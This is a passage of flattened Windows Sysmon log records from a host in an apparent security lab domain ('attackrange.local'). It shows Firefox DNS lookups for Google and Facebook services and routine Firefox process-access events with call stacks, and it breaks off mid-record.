22542200x800000000000000017550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.931{59A5CD1D-8E56-6005-2E00-00000000A301}2464174.16.217.172.in-addr.arpa.0type: 12 fra15s11-in-f174.1e100.net;type: 12 fra15s11-in-f14.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000017549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.931{59A5CD1D-8E56-6005-2E00-00000000A301}246459.253.4.64.in-addr.arpa.0type: 12 pulsproxy-web-public-1-1-lvsaz03.ebay.com;C:\Windows\sysmon64.exe 22542200x800000000000000017548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.893{59A5CD1D-945A-6005-3305-00000000A301}7052accounts.google.com02a00:1450:4001:817::200d;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.892{59A5CD1D-945A-6005-3305-00000000A301}7052accounts.google.com0172.217.21.205;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.891{59A5CD1D-945A-6005-3305-00000000A301}7052accounts.google.com0::ffff:172.217.21.205;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.688{59A5CD1D-945A-6005-3305-00000000A301}7052fonts.googleapis.com02a00:1450:4001:808::200a;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.686{59A5CD1D-945A-6005-3305-00000000A301}7052fonts.googleapis.com0216.58.207.74;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.686{59A5CD1D-945A-6005-3305-00000000A301}7052fonts.googleapis.com0::ffff:216.58.207.74;C:\Program Files\Mozilla 
Firefox\firefox.exe 22542200x800000000000000017542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.213{59A5CD1D-945A-6005-3305-00000000A301}7052i.ytimg.com02a00:1450:4001:816::2016;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.211{59A5CD1D-945A-6005-3305-00000000A301}7052i.ytimg.com0172.217.23.118;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:20.397{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 
10341000x800000000000000017539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:20.397{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:20.396{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla 
Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000017537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:20.002{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.736{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.731{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.731{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.932{59A5CD1D-8E56-6005-2E00-00000000A301}246419.20.240.157.in-addr.arpa.0type: 12 xx-fbcdn-shv-02-frt3.fbcdn.net;C:\Windows\sysmon64.exe 22542200x800000000000000017573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.931{59A5CD1D-8E56-6005-2E00-00000000A301}2464205.21.217.172.in-addr.arpa.0type: 12 fra16s12-in-f205.1e100.net;type: 12 fra16s12-in-f13.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000017572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.646{59A5CD1D-945A-6005-3305-00000000A301}7052facebook.com02a03:2880:f11c:8183:face:b00c:0:25de;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.645{59A5CD1D-945A-6005-3305-00000000A301}7052scontent.xx.fbcdn.net02a03:2880:f01c:8012:face:b00c:0:3;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:19.644{59A5CD1D-945A-6005-3305-00000000A301}7052facebook.com0157.240.20.35;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.704{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.700{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.699{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.382{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.382{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla 
Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.353{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla 
Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971 10341000x800000000000000017563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.353{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8 10341000x800000000000000017562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.352{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.352{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program 
Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.352{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla 
Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:21.351{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000017592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:22.944{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 